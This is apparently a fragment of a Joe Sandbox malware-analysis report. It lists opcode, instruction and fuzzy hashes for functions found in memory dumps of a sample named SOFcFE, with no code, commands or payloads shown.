                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86fc81e213d3f2eaaa3aafb46ceb74898342c3233678545dec844f5df3df1947
                                                              • Instruction ID: 70e72158a361b9a4d59360eb2dbc7a0607ef2393e1f8164ea50c044cd57a3bfe
                                                              • Opcode Fuzzy Hash: 86fc81e213d3f2eaaa3aafb46ceb74898342c3233678545dec844f5df3df1947
                                                              • Instruction Fuzzy Hash: E1310731B143A487DF294666989437EA6AAABC4311F14497AE807C7380EB75CD4587E1
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 698ae8f824245e1c5eb5f510169d081ca0d6d8e42bba4ae0ce733da6364d56f8
                                                              • Instruction ID: fa8dfaf3580c96d3782093d58a240625faee7ddae943f8e5d5e408ce4b1bab76
                                                              • Opcode Fuzzy Hash: 698ae8f824245e1c5eb5f510169d081ca0d6d8e42bba4ae0ce733da6364d56f8
                                                              • Instruction Fuzzy Hash: 42317A3160520AEFCB069F64D858ABF3BB2EB88254F404825F915D7394CB35CE21DBA1
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2345fec3df06677dce2d179495b337e97d32937d8982c4ae7a4c0a3689136efe
                                                              • Instruction ID: aaa7052bbf42e254f9133c5f2c9b7e44944231fbfd36fecaa2957728f5ada3d8
                                                              • Opcode Fuzzy Hash: 2345fec3df06677dce2d179495b337e97d32937d8982c4ae7a4c0a3689136efe
                                                              • Instruction Fuzzy Hash: D0318F307042118FDB269B6AD95473E7B67BFC8710B240E6AF016CB396EB2ADD40C795
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f03801e05c494c5c975a7ce115ac7e12ef0b1f7b34da908a07f1bbaf21fd008
                                                              • Instruction ID: 6929381b7562279fe2f0e5690f4433ced70d9901bf80570583668e8daa75d5f9
                                                              • Opcode Fuzzy Hash: 0f03801e05c494c5c975a7ce115ac7e12ef0b1f7b34da908a07f1bbaf21fd008
                                                              • Instruction Fuzzy Hash: 6B21A1303042008BDB26566A857877F7697AFC4769F148A39F406CBB98EF76CC82D791
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb12c5047e8936218aca9257ef374aa88e1f9d002642d3195f0884cb9c73d506
                                                              • Instruction ID: 6c6ebf77b6d9ecc0e0fb1206f153da5c7a97dfba9c37b2414aa169020c74264a
                                                              • Opcode Fuzzy Hash: fb12c5047e8936218aca9257ef374aa88e1f9d002642d3195f0884cb9c73d506
                                                              • Instruction Fuzzy Hash: 262168357046119FC71A9B29C46893FB7A6FFC9755724896AE81ACB394CF30CC02CB90
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b176d551ed55311881d3eeaf57347c4adaa70bc8980de8b3f3b35bb5e1d375bb
                                                              • Instruction ID: 1c4af74d7fa2ba05354b30a6d2927001e508fab83b8234d7c97993a6e74ef9b5
                                                              • Opcode Fuzzy Hash: b176d551ed55311881d3eeaf57347c4adaa70bc8980de8b3f3b35bb5e1d375bb
                                                              • Instruction Fuzzy Hash: 31216235E00318AFCF15DB38D440AAE7BA5EB9D360B60C519D81A9B354DB31EE46CBD1
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762333006.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_139d000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e458dc77b4edcf1d15f88946b50a52698419305ff9bbbc96978827dc4335f38b
                                                              • Instruction ID: 6cc8d803f8b3699eb787344e1ad7097ca3ed7afabc0db1d26daa7459c7bb0f5d
                                                              • Opcode Fuzzy Hash: e458dc77b4edcf1d15f88946b50a52698419305ff9bbbc96978827dc4335f38b
                                                              • Instruction Fuzzy Hash: FC2100B16042049FDF15DF68D9C5B26BB65EB84318F20C5ADE8490F342C736D847CA62
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0444f132195239440c607b82d27bbc06e014d5da7aec1a2e79b6faf60981d7e1
                                                              • Instruction ID: 10eb2ce803492581d781512ab1ae70418341950e28746003bea929439def9f51
                                                              • Opcode Fuzzy Hash: 0444f132195239440c607b82d27bbc06e014d5da7aec1a2e79b6faf60981d7e1
                                                              • Instruction Fuzzy Hash: B721D232605109DFDB16AF68D858BBF3BB2EB88354F004829E805DB344CB35CE65DBA1
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 43c6ae9616cd18aba37f10bd0d61e79e0f05562ce50027f8aeae40604f451d9b
                                                              • Instruction ID: d66654509bf65fd141fa28a43b44893e52fc2615fdae50be52fc57a5ad244259
                                                              • Opcode Fuzzy Hash: 43c6ae9616cd18aba37f10bd0d61e79e0f05562ce50027f8aeae40604f451d9b
                                                              • Instruction Fuzzy Hash: C4217272B401089BCB14DF58D888BEEBBB5FB8C314F144826E916E7350DB719D20CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7a4ac31fd08370e757e60eabeecf8e7684c89f533850400b2ee407c3fe63665
                                                              • Instruction ID: 701fc0ee0a515054a11c1cf8e479c62ce08cf8d7c10d87f60521282a19c5f8cc
                                                              • Opcode Fuzzy Hash: d7a4ac31fd08370e757e60eabeecf8e7684c89f533850400b2ee407c3fe63665
                                                              • Instruction Fuzzy Hash: 26218B30E05248DFDB05DFA5E554AEEBFB6AF89204F248469E401E6390DB34DA41DB60
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cc2ef59e3d7f721c87338caf4180b2ab478f760a61322751a8488c943c1b437f
                                                              • Instruction ID: 190760123d7598a92cd802a3dfc4d3d42ac846f9f2b1f42b3b77e5963ac5f65b
                                                              • Opcode Fuzzy Hash: cc2ef59e3d7f721c87338caf4180b2ab478f760a61322751a8488c943c1b437f
                                                              • Instruction Fuzzy Hash: FE214DB5D002099FEB11EFA8D94079EBFB2FF45301F1085AAC0599B359EB315A069B81
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 511f124497403dbebdae3fd39030be4409c16402a4bc56a5af743eebf7996a5f
                                                              • Instruction ID: 3890f02ee2e6b427fd6dfd7f8b3f0aed6e793c766e6e4ba5ab97f9990a37b0b1
                                                              • Opcode Fuzzy Hash: 511f124497403dbebdae3fd39030be4409c16402a4bc56a5af743eebf7996a5f
                                                              • Instruction Fuzzy Hash: BF112B35704611AFC7165B2AC46893EB7AAFFC57653254879E81ADB350CF31DC02CB94
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 47a11758b8fa0cf9d240ed38f7521b611f7cf15243886289e0ed2b96b1a9b78d
                                                              • Instruction ID: fffcaaa0d994214071d73c15fc33dce3fb5a9b7f599c369c055e1233bc47a7cd
                                                              • Opcode Fuzzy Hash: 47a11758b8fa0cf9d240ed38f7521b611f7cf15243886289e0ed2b96b1a9b78d
                                                              • Instruction Fuzzy Hash: 7021C074D052098FCB05EFA9D9595EEBBF4FF0A300F10556AD805B3214EB311A96CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c435d4a17e43af59c0dba1d8c0f3e49203745c0daedbf444dd18c97c6ffbedd2
                                                              • Instruction ID: ed9bf1cc87658ce439dabc382d9f07f71bbf2987fe24dd61eada51ca8f696c55
                                                              • Opcode Fuzzy Hash: c435d4a17e43af59c0dba1d8c0f3e49203745c0daedbf444dd18c97c6ffbedd2
                                                              • Instruction Fuzzy Hash: 16112E75D0020DDFDB15EFA8D940B9EBBF6FB44304F1085AAC0199B358EB705A069F81
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762333006.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_139d000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                              • Instruction ID: d086d6d844d322e6bb28a59729841cc9848d3586a99be4c9efcee4f30c879854
                                                              • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                              • Instruction Fuzzy Hash: F711BE75504244CFCB16CF58C5C5B16BF62FB44318F24C6A9D8494B252C33AD44ACF61
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e6f62b2e6b97f7f84c755c1d5a7cf55e7d6a477d788e9bac9c709e2117139571
                                                              • Instruction ID: 098bd24555d387c82eecf6ddd0a0f70f0139a64ab0f1df137199a4a285671ecf
                                                              • Opcode Fuzzy Hash: e6f62b2e6b97f7f84c755c1d5a7cf55e7d6a477d788e9bac9c709e2117139571
                                                              • Instruction Fuzzy Hash: B301D432B001156BCB02DEA99844BAF3BEAEBCC294F14841AF505D7344CA768D219BA0
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f9eb61529c6de1c17db957762d349eb211fb987afc54f1a07c0dac8a5ca94ad5
                                                              • Instruction ID: cf201e9f70f50bdf8dfb8f210e9243570486d0738efb32db74176ca54dd476d2
                                                              • Opcode Fuzzy Hash: f9eb61529c6de1c17db957762d349eb211fb987afc54f1a07c0dac8a5ca94ad5
                                                              • Instruction Fuzzy Hash: 12F0B131740A104F87175A2EE45876A77DEFFC8A593154479E546C7361DF21CD13C790
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 740e24196daf6e800622c035ec430c6443cc29499689802fbc8a727082d9caed
                                                              • Instruction ID: c121c5cd53dc93fe797621b21202a5045985569eaf6d7394824f8fa52c77de7e
                                                              • Opcode Fuzzy Hash: 740e24196daf6e800622c035ec430c6443cc29499689802fbc8a727082d9caed
                                                              • Instruction Fuzzy Hash: A4019A79D0030AEFCB02DFA8E884AAEBBB5FF4A304F004166D910A3358D7359A41DF90
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8960026af1f053c4a8829e55094031742c8a26c75bf6bcac54c35457800437e
                                                              • Instruction ID: 090cb0fbad2898296dd8d7c5e5e4b46acdd9fec895f2cd0b22517b8bb46cbfa9
                                                              • Opcode Fuzzy Hash: d8960026af1f053c4a8829e55094031742c8a26c75bf6bcac54c35457800437e
                                                              • Instruction Fuzzy Hash: E7E02031D543558BC701D7F49C040EEFF34ADC6211758855BC46137090EB30265AC361
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cb0ec2165315b4f00db62b2f8b2b64fcd663d8743660aac9695debed2053f04c
                                                              • Instruction ID: 37566068d83185f0e4326393310b650fe23c4ddc421d9b9b98e4168d4d22c869
                                                              • Opcode Fuzzy Hash: cb0ec2165315b4f00db62b2f8b2b64fcd663d8743660aac9695debed2053f04c
                                                              • Instruction Fuzzy Hash: 7AD05B31D2032A57CB10E7A5DC048DFFB38EED6321B904626D52437144FB706659C6E1
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 199c34dd2f748df5ced9bb78a837a65115b6d238d1f5db59c0ead7f89a762253
                                                              • Instruction ID: f7b27170948a596a7e5d88d70ce47b5c36fe08bb5b54626c100f6fa37da7f81d
                                                              • Opcode Fuzzy Hash: 199c34dd2f748df5ced9bb78a837a65115b6d238d1f5db59c0ead7f89a762253
                                                              • Instruction Fuzzy Hash: 81D05E328443564FD741EB78F849A153F69A780114F048711D1058A60EDFB4A8159B61
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55f79c34b2d1f951454c356ec3e1be9a0f787a0113888f3feff579d107548f81
                                                              • Instruction ID: 0b24d9589d77ddbac15e74e469b960dc4c326f08d405719d2cd87c7b80062da2
                                                              • Opcode Fuzzy Hash: 55f79c34b2d1f951454c356ec3e1be9a0f787a0113888f3feff579d107548f81
                                                              • Instruction Fuzzy Hash: 1DD0673BB400089FCB049F98E8449DDF776FB98221B448517E916E7260C6319965DB64
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e3a931e4600d05097953b2ff7c1419d85c16c03ee6822d26c48e5fc76af00ea5
                                                              • Instruction ID: 7dfc86bef9fb012bb08058ab41667ae62ee9ede0bdedca47ff54ae02bc07ff4d
                                                              • Opcode Fuzzy Hash: e3a931e4600d05097953b2ff7c1419d85c16c03ee6822d26c48e5fc76af00ea5
                                                              • Instruction Fuzzy Hash: 9AC080358043254FD681F775FC54955372EA7C01157408711D0054D34DDEB47C4A57A5